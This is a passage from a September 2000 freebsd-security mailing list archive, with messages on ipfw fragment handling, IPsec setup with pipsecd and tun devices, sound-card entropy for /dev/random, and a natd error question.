Aug 2000, Ali Alaoui El Hassani wrote: > > > > > > > > Dear all, > > > > I need to install > > > > stlenet, sftp , shttp on a FreeBsd 3.3 > > > > > > > > any Help? > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > -- > > > > Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86 > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -- Key fingerprint = 08 2C 60 63 FB DE A5 67 96 38 02 0F FA 9B 81 86 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 21:39:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 4D59F37B43C; Sun, 3 Sep 2000 21:39:18 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 3 Sep 2000 21:38:03 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id VAA63203; Sun, 3 Sep 2000 21:39:04 -0700 (PDT) (envelope-from cjc) Date: Sun, 3 Sep 2000 21:39:03 -0700 From: "Crist J . Clark" To: Dragos Ruiu Cc: Bill Fumerola , Darren Reed , Robert Watson , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments Message-ID: <20000903213903.Q62475@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> <0009031819571V.20066@smp.kyx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <0009031819571V.20066@smp.kyx.net>; from dr@kyx.net on Sun, Sep 03, 2000 at 05:32:00PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Sep 03, 2000 at 05:32:00PM -0700, Dragos Ruiu wrote: > On Sun, 03 Sep 2000, Bill Fumerola wrote: > > On Mon, Sep 04, 2000 at 07:10:46AM +1100, Darren Reed wrote: > > > > > It never reassembles and doesn't hold them in a buffer until they're > > > all received either. > > > > Which I still think is the proper behavior for both ipfw and ipfilter. > > > > You don't have to buffer until they're reassembled. Hmmm... Wha'? > If you want to be > rigorous, you may have to buffer in the case when you don't receive > the first segment first (in which case you would have to buffer until you > received the first fragment with the headers that will let the firewall > decide if it should let the fragments through or not) but in practice > this is an extreme corner case, so imho, you can cheat a little > and use a heuristic and say you won't buffer and if you don't receive > the first frag first too bad (because in practice mis-sequencing > almost never occurs in the wild) - I don't know if there are any > RFC rules regarding this anyway, so you may even be able to > declare this correct behaviour. :-) See RFC791, sec 3.2 and RFC1122, sec 3.3.2, 3.3.3. Oh, and a totally unrelated topic, whose MUA puts _both_ my From: and Reply-To: addresses in the recipients ensuring that I have received each message in this thread twice? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 21:44:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from po4.wam.umd.edu (po4.wam.umd.edu [128.8.10.166]) by hub.freebsd.org (Postfix) with ESMTP id 545C437B43C for ; Sun, 3 Sep 2000 21:44:16 -0700 (PDT) Received: from locust.wam.umd.edu (adsl-138-88-45-28.bellatlantic.net [138.88.45.28]) by po4.wam.umd.edu (8.9.3/8.9.3) with ESMTP id AAA08302 for ; Mon, 4 Sep 2000 00:44:15 -0400 (EDT) Message-Id: <4.3.2.7.0.20000904004107.00b6deb8@pop.wam.umd.edu> X-Sender: bmbintz@pop.wam.umd.edu X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 04 Sep 2000 00:41:18 -0400 To: freebsd-security@freebsd.org From: Brian Bintz Subject: subscribe Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 3 22:16: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 2BB8A37B424 for ; Sun, 3 Sep 2000 22:16:04 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 3 Sep 2000 22:14:58 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id WAA63472; Sun, 3 Sep 2000 22:15:56 -0700 (PDT) (envelope-from cjc) Date: Sun, 3 Sep 2000 22:15:56 -0700 From: "Crist J . Clark" To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: freebsd-security@FreeBSD.ORG Subject: Re: SOS Help ipsec (Esp Ah) Message-ID: <20000903221556.R62475@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Mon, Sep 04, 2000 at 02:46:32AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote: > > Dear All, > > I am running into trouble. I am using tun0 as tunnel of a secure > communication via ESP. I want also to use Ah as another reliable kind of > communication so I thaught about using it via tun1. when I wanted to > create tun1 i.e (I went to GENERIC and modified the number of tunnels > from 1 to 2) and I wanted to recompile the kernel , I had a recompilation > error due to some patch that I applied to my kernel previously. > well the thing is that I can not use point to point links ie sl0,pp0. > Due to time limitations I can not reinstall another kernel. > > My question is: > Do you have any idea on how I can overpass this situation ? Well, you should not need tun(4) devices at all to do IPsec. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 5:44:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id B315E37B424; Mon, 4 Sep 2000 05:44:37 -0700 (PDT) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id MAA03727; Mon, 4 Sep 2000 12:44:28 GMT Message-ID: <39B3992B.7B823DEE@algroup.co.uk> Date: Mon, 04 Sep 2000 13:44:28 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.72 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: James Wyatt , Garrett Wollman , Adam Back , security@FreeBSD.org Subject: Re: yarrow & /dev/random References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Sun, 27 Aug 2000, James Wyatt wrote: > > > On servers with no regular keyboard or mouse use, there is usually enough > > entropy in the disk and network IO to serve the purpose. Small servers > > with low net and disk entropy often get used as consoles for busier > > servers. Your mileage may vary, of course. What other sources of entropy > > might one consider? Maybe an AM radio tuned to static hooked into > > /dev/audio to get random samples? - Jy@ > > My observations suggest that a sound card tuned to maximum input gain with > no microphone input (i.e. sampling noise in the card) is a very good > source of randomness, with at least 6 bits of entropy per 16 bit sample > for most cards, which can be sampled at 44Khz (i.e. about 32 kilobytes of > randomness per second, far in excess of what Yarrow needs). > > More than enough for even heavy server needs. This is only safe to do if you can guarantee that your sound card is protected from outside influence - e.g. radio transmissions putting known noise into your data. TEMPEST shielding would be a good start. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 7: 3:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0F4C337B422 for ; Mon, 4 Sep 2000 07:03:46 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA22734; Mon, 4 Sep 2000 07:02:30 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda22732; Mon Sep 4 07:02:11 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA64913; Mon, 4 Sep 2000 07:02:10 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdR64911; Mon Sep 4 07:01:11 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e84E1Bp23058; Mon, 4 Sep 2000 07:01:11 -0700 (PDT) Message-Id: <200009041401.e84E1Bp23058@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdg23052; Mon Sep 4 07:00:44 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: cjclark@alum.mit.edu Cc: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma>, freebsd-security@FreeBSD.ORG Subject: Re: SOS Help ipsec (Esp Ah) In-reply-to: Your message of "Sun, 03 Sep 2000 22:15:56 PDT." <20000903221556.R62475@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 04 Sep 2000 07:00:44 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000903221556.R62475@149.211.6.64.reflexcom.com>, "Crist J . Clark " writes: > On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote: > > > > Dear All, > > > > I am running into trouble. I am using tun0 as tunnel of a secure > > communication via ESP. I want also to use Ah as another reliable kind of > > communication so I thaught about using it via tun1. when I wanted to > > create tun1 i.e (I went to GENERIC and modified the number of tunnels > > from 1 to 2) and I wanted to recompile the kernel , I had a recompilation > > error due to some patch that I applied to my kernel previously. > > well the thing is that I can not use point to point links ie sl0,pp0. > > Due to time limitations I can not reinstall another kernel. > > > > My question is: > > Do you have any idea on how I can overpass this situation ? > > Well, you should not need tun(4) devices at all to do IPsec. He would if he's using the pipsecd port. He hasn't told us what software he's using, so we don't have enough information to comment about his problem. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 8: 5: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 2771C37B423 for ; Mon, 4 Sep 2000 08:04:50 -0700 (PDT) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id OAA02953; Mon, 4 Sep 2000 14:58:41 GMT Date: Mon, 4 Sep 2000 14:58:40 +0000 (GMT) From: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> To: Cy Schubert - ITSD Open Systems Group Cc: cjclark@alum.mit.edu, freebsd-security@FreeBSD.ORG Subject: Re: SOS Help ipsec (Esp Ah) In-Reply-To: <200009041401.e84E1Bp23058@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear all, Yes indeed I am using the pipsecd port Thank you in Advance, Ali ALaoui El Hassani. On Mon, 4 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > In message <20000903221556.R62475@149.211.6.64.reflexcom.com>, "Crist J > . Clark > " writes: > > On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote: > > > > > > Dear All, > > > > > > I am running into trouble. I am using tun0 as tunnel of a secure > > > communication via ESP. I want also to use Ah as another reliable kind of > > > communication so I thaught about using it via tun1. when I wanted to > > > create tun1 i.e (I went to GENERIC and modified the number of tunnels > > > from 1 to 2) and I wanted to recompile the kernel , I had a recompilation > > > error due to some patch that I applied to my kernel previously. > > > well the thing is that I can not use point to point links ie sl0,pp0. > > > Due to time limitations I can not reinstall another kernel. > > > > > > My question is: > > > Do you have any idea on how I can overpass this situation ? > > > > Well, you should not need tun(4) devices at all to do IPsec. > > He would if he's using the pipsecd port. > > He hasn't told us what software he's using, so we don't have enough > information to comment about his problem. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 9:25:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 602A637B422; Mon, 4 Sep 2000 09:25:51 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA08127; Mon, 4 Sep 2000 10:25:47 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA14327; Mon, 4 Sep 2000 10:25:45 -0600 (MDT) (envelope-from nate) Date: Mon, 4 Sep 2000 10:25:45 -0600 (MDT) Message-Id: <200009041625.KAA14327@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Darren Reed Cc: nate@yogotech.com, billf@chimesnet.com (Bill Fumerola), rwatson@FreeBSD.ORG (Robert Watson), dr@kyx.net (Dragos Ruiu), cjclark@alum.mit.edu, cjclark@reflexnet.net (Crist J . Clark), list@rachinsky.de (Nicolas), freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments In-Reply-To: <200009040345.OAA24476@cairo.anu.edu.au> References: <200009040233.UAA12035@nomad.yogotech.com> <200009040345.OAA24476@cairo.anu.edu.au> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > It never reassembles and doesn't hold them in a buffer until they're > > > > all received either. > > > > > > Which I still think is the proper behavior for both ipfw and ipfilter. > > > > I can think of some trivially easy DoS attacks if this is done... > > Ummm, what exactly would you be inflicting a DoS attack on ? The firewall. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 10:24:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id EFC9737B423 for ; Mon, 4 Sep 2000 10:24:50 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA23160; Mon, 4 Sep 2000 10:23:56 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda23158; Mon Sep 4 10:23:51 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA65547; Mon, 4 Sep 2000 10:23:51 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdv65545; Mon Sep 4 10:23:17 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e84HNGQ23967; Mon, 4 Sep 2000 10:23:16 -0700 (PDT) Message-Id: <200009041723.e84HNGQ23967@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdG23963; Mon Sep 4 10:22:31 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: Ali Alaoui El Hassani <961BE653994@stud.alakhawayn.ma> Cc: Cy Schubert - ITSD Open Systems Group , cjclark@alum.mit.edu, freebsd-security@FreeBSD.ORG Subject: Re: SOS Help ipsec (Esp Ah) In-reply-to: Your message of "Mon, 04 Sep 2000 14:58:40 -0000." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 04 Sep 2000 10:22:30 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Ali A laoui El Hassani writes: > Dear all, > Yes indeed I am using the pipsecd port > > Thank you in Advance, > > Ali ALaoui El Hassani. > You still haven't told us much about the software you're using. What release of FreeBSD are you using? (From your description of he problem you might be using 2.x or 3.x.) What's in your kernel config? How do you start pipsecd? What's in your pipsecd.conf file (don't list your passwords)? ... Just a guess (still don't know what software you're using but assuming FreeBSD 2.x or 3.x), but increase the number of tun devices from 2 to 4. Pipsecd uses 2 tun devices per VPN tunnel. As a cautionary note, not providing all of the relevant background information to solve a problem will result in no solution and possibly even insults. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC > On Mon, 4 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > > > In message <20000903221556.R62475@149.211.6.64.reflexcom.com>, "Crist J > > . Clark > > " writes: > > > On Mon, Sep 04, 2000 at 02:46:32AM +0000, Ali Alaoui El Hassani wrote: > > > > > > > > Dear All, > > > > > > > > I am running into trouble. I am using tun0 as tunnel of a secure > > > > communication via ESP. I want also to use Ah as another reliable kind o > f > > > > communication so I thaught about using it via tun1. when I wanted to > > > > create tun1 i.e (I went to GENERIC and modified the number of tunnels > > > > from 1 to 2) and I wanted to recompile the kernel , I had a recompilati > on > > > > error due to some patch that I applied to my kernel previously. > > > > well the thing is that I can not use point to point links ie sl0,pp0. > > > > Due to time limitations I can not reinstall another kernel. > > > > > > > > My question is: > > > > Do you have any idea on how I can overpass this situation ? > > > > > > Well, you should not need tun(4) devices at all to do IPsec. > > > > He would if he's using the pipsecd port. > > > > He hasn't told us what software he's using, so we don't have enough > > information to comment about his problem. > > > > > > Regards, Phone: (250)387-8437 > > Cy Schubert Fax: (250)387-5766 > > Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca > > Open Systems Group, ITSD, ISTA > > Province of BC > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 10:36:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id F0FD237B423; Mon, 4 Sep 2000 10:36:39 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 5042E1C5C; Mon, 4 Sep 2000 13:36:39 -0400 (EDT) Date: Mon, 4 Sep 2000 13:36:39 -0400 From: Bill Fumerola To: Nate Williams Cc: Darren Reed , Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments Message-ID: <20000904133639.V33771@jade.chc-chimes.com> References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> <200009040233.UAA12035@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200009040233.UAA12035@nomad.yogotech.com>; from nate@yogotech.com on Sun, Sep 03, 2000 at 08:33:53PM -0600 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Sep 03, 2000 at 08:33:53PM -0600, Nate Williams wrote: > > > It never reassembles and doesn't hold them in a buffer until they're > > > all received either. > > > > Which I still think is the proper behavior for both ipfw and ipfilter. > > I can think of some trivially easy DoS attacks if this is done... I meant in my original message "I think the current behavior of holding not reassembling and not holding them in a buffer is the proper behavior for both ipfw and ipfilter". I was agreeing with darrenr. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 10:38:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id B0B8D37B422; Mon, 4 Sep 2000 10:38:42 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id LAA09314; Mon, 4 Sep 2000 11:38:28 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id LAA14631; Mon, 4 Sep 2000 11:38:28 -0600 (MDT) (envelope-from nate) Date: Mon, 4 Sep 2000 11:38:28 -0600 (MDT) Message-Id: <200009041738.LAA14631@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Bill Fumerola Cc: Nate Williams , Darren Reed , Robert Watson , Dragos Ruiu , cjclark@alum.mit.edu, "Crist J . Clark" , Nicolas , freebsd-security@FreeBSD.ORG Subject: Re: ipfw and fragments In-Reply-To: <20000904133639.V33771@jade.chc-chimes.com> References: <200009032010.HAA15013@cairo.anu.edu.au> <20000903173136.S33771@jade.chc-chimes.com> <200009040233.UAA12035@nomad.yogotech.com> <20000904133639.V33771@jade.chc-chimes.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > It never reassembles and doesn't hold them in a buffer until they're > > > > all received either. > > > > > > Which I still think is the proper behavior for both ipfw and ipfilter. > > > > I can think of some trivially easy DoS attacks if this is done... > > I meant in my original message "I think the current behavior of holding > not reassembling and not holding them in a buffer is the proper behavior > for both ipfw and ipfilter". > > I was agreeing with darrenr. Oh. Then I agree with you. :) Nate > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 14:36:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DB34737B42C; Mon, 4 Sep 2000 14:36:30 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA66872; Mon, 4 Sep 2000 14:36:30 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 4 Sep 2000 14:36:30 -0700 (PDT) From: Kris Kennaway To: Adam Laurie Cc: James Wyatt , Garrett Wollman , Adam Back , security@FreeBSD.org Subject: Re: yarrow & /dev/random In-Reply-To: <39B3992B.7B823DEE@algroup.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 4 Sep 2000, Adam Laurie wrote: > Kris Kennaway wrote: > > > > On Sun, 27 Aug 2000, James Wyatt wrote: > > > > > On servers with no regular keyboard or mouse use, there is usually enough > > > entropy in the disk and network IO to serve the purpose. Small servers > > > with low net and disk entropy often get used as consoles for busier > > > servers. Your mileage may vary, of course. What other sources of entropy > > > might one consider? Maybe an AM radio tuned to static hooked into > > > /dev/audio to get random samples? - Jy@ > > > > My observations suggest that a sound card tuned to maximum input gain with > > no microphone input (i.e. sampling noise in the card) is a very good > > source of randomness, with at least 6 bits of entropy per 16 bit sample > > for most cards, which can be sampled at 44Khz (i.e. about 32 kilobytes of > > randomness per second, far in excess of what Yarrow needs). > > > > More than enough for even heavy server needs. > > This is only safe to do if you can guarantee that your sound card is > protected from outside influence - e.g. radio transmissions putting > known noise into your data. TEMPEST shielding would be a good start. If interference from men in black is part of your threat model ;-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 16:39:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (mail.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with SMTP id 4DBF837B422; Mon, 4 Sep 2000 16:39:34 -0700 (PDT) Received: by border.alcanet.com.au id <115204>; Tue, 5 Sep 2000 10:39:05 +1000 Content-return: prohibited Date: Tue, 05 Sep 2000 10:39:21 +1100 From: Peter Jeremy Subject: Re: yarrow & /dev/random In-reply-to: ; from kris@FreeBSD.ORG on Mon, Sep 04, 2000 at 02:36:30PM -0700 To: Kris Kennaway Cc: Adam Laurie , security@FreeBSD.ORG Mail-followup-to: Kris Kennaway , Adam Laurie , security@FreeBSD.ORG Message-Id: <00Sep5.103905est.115204@border.alcanet.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.4i References: <39B3992B.7B823DEE@algroup.co.uk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000-Sep-04 14:36:30 -0700, Kris Kennaway wrote: >On Mon, 4 Sep 2000, Adam Laurie wrote: >> This is only safe to do if you can guarantee that your sound card is >> protected from outside influence - e.g. radio transmissions putting >> known noise into your data. TEMPEST shielding would be a good start. > >If interference from men in black is part of your threat model ;-) I don't think that follows. For a soundcard to produce useful entropy, you are relying on it's output being primarily thermal noise. Even without deliberate tampering by MIB, the soundcard output can be affected by ambient electrical noise: 50/60Hz line noise and power-supply inverter noise are the most likely culprits in a PC. If you are located close to a radio transmitter, the transmitter can affect the output. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 22:35: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from core.schoolnet.sc.ug (wawa.eahd.or.ug [216.129.132.164]) by hub.freebsd.org (Postfix) with ESMTP id 4F3CB37B42C for ; Mon, 4 Sep 2000 22:35:02 -0700 (PDT) Received: from localhost (begj@localhost) by core.schoolnet.sc.ug (8.9.3/8.9.3/SuSE Linux 8.9.3-0.1) with ESMTP id IAA03251 for ; Tue, 5 Sep 2000 08:38:22 +0300 Date: Tue, 5 Sep 2000 08:38:21 +0300 (EAT) From: To: freebsd-security@freebsd.org Subject: Natd Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm quite new to Network Address Translation on FreeBSD 4.1-Stable but I managed to get it running and I now use that box as a gateway. One thing that pertubs me is the message that natd gives saying that it "failed to write a packet back. Host is down" Can anyone shed some light on this or give me a few directions on where to find the info on this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 4 22:57:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 82ABD37B423 for ; Mon, 4 Sep 2000 22:57:35 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft 